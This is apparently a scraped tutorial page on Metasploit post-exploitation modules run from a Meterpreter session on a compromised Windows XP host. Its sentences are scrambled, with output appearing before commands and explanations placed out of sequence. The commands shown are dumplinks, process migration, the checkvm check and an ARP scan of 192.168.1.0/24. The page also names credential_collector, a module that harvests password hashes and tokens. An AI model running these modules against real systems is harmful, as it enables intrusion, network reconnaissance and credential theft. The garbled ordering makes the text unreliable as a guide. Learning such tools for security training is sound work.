Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk. Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk. Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk. Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk. Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk. Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\. Meterpreter > run post/windows/gather/dumplinks Current server process: svchost.exe (1096) meterpreter > run post/windows/manage/migrate Note that, as shown below, we first need to migrate into a user process prior to running the module. lnk files in a users Recent Documents which could be useful for further information gathering. The credential_collector module harvests passwords hashes and tokens on the compromised host. Checking if V-MAC-XP is a Virtual Machine. meterpreter > run post/windows/gather/checkvm This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines. The checkvm post module, simply enough, checks to see if the compromised host is a virtual machine. meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 The arp_scanner post module will perform an ARP scan for a given range through a compromised host. Metasploit offers a number of post exploitation modules that allow for further information gathering on your target network. Security Operations for Beginners (SOC-100).
0 kommentar(er)
